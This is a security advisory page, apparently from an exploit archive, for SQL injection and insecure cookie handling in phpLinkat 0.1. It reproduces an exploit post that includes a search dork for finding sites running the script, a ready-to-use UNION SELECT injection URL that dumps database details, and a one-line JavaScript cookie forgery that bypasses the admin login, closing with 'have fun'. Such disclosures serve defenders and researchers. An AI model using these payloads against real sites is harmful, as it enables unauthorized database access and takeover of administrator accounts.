phpLinkat 0.1 Insecure Cookie Handling / SQL Injection Vulnerability

2008.08.02
Credit: Encrypt3d.M!nd
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2008-3406 | CVE-2008-3407
CWE: CWE-89
CWE-287
Dork: \"Powered by DesClub.com - phpLinkat\"

######## ## ## ###### ######## ## ## ######## ######## ####### ######## ## ### ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## #### ## ## ## ## #### ## ## ## ## ## ## ###### ## ## ## ## ######## ## ######## ## ####### ## ## ## ## #### ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ## ## ## ## ## ## ## ######## ## ## ###### ## ## ## ## ## ####### ######## ################################ !R4Q!4N H4CK3R ################################### # # phpLinkat 0.1 Insecure Cookie Handling Vulnerability & Sql Injection Exploit # # Founded By : Encrypt3d.M!nd # encrypt3d.blogspot.com # # Dork : "Powered by DesClub.com - phpLinkat" # Description : phpLinkat is a free link indexing script written in PHP and runs on MySQL.This script is suffering a sql injection bug and insecure cookie handling. # phpLinkat : Sql Injection Exploit PoC :www.site.com/phpLinkat/showcat.php?catid=666%20union%20select%20concat(version(),0x3a,database(),0x3a,user()),2,3,4,5,6/* # phpLinkat : Insecure Cookie Handling /admin/login2.php: 6 : if( ($username == $cpusername) && ($password == $cppassword) ){ 7 : setcookie("login","right"); <<< wtf!! 8 : echo <<<EOF Exploit: javascript:document.cookie = "login=right; path=/;"; Then goto "phplinkat/admin/",and have fun ^_^ #End

References:

http://xforce.iss.net/xforce/xfdb/44060
http://www.securityfocus.com/bid/30386
http://www.milw0rm.com/exploits/6140


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top